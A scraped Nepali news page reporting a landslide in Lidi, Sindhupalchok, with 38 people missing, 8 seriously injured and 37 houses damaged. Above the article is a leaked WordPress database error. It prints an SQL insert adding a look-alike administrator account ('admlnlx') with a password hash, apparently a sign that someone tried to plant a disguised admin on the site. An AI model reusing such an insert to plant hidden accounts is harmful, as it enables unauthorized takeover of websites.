WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BWnrS8Nzjv3OoGcrE3L/mvp344lDZT1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-12 22:16:05', '', 'admlnlx', 'admlnlx')

सिन्धुपाल्चोक पहिरोमा ३८ जना बेपत्ता – Gaule Khabar

सिन्धुपाल्चोक पहिरोमा ३८ जना बेपत्ता

सिन्धुपाल्चोक पहिरोमा ३८ जना बेपत्ता

काठमाडौं । सिन्धुपाल्चोकको जुगल गाउँपालिका २ लिदिको लामा टोलमा पहिरोमा परेर ३८ जना बेपत्ता भएका छन् । शुक्रबार बिहान करिब ६ बजेतिर खसेको पहिरोमा परेका मध्ये ३८ जना सम्पर्कमा नआएको र ८ जना गम्भीर घाइते रहेको वडाध्यक्ष प्रताप लामाले बताए ।

वडाध्यक्ष लामाका अनुसार सुरक्षाकर्मी र स्थानीयले उद्धार कार्य जारीराखेका छन् । पहिरोले ३७ घरमा क्षति पुर्‍याएको र अहिले घाइतेहरु कठामाण्डौ र सिन्धुपाल्चोकमा उपचार भाईरहेको छ ।

जुगल गाउँपालिकाले साउन २२ गते लिदिका १७२ पहिरोको जोखिममा रहेको जिल्ला विपद् व्यवस्थापन समितिलाई जानकारी गराएको थियो । पालिकाका अनुसार वडा नम्बर २ कै सानोनाम्फा, सुकुली, सञ्चगाउँ, भुल्के, निम्लुङ, बैगाङ टोल पनि पहिरोको जोखिममा छन् ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका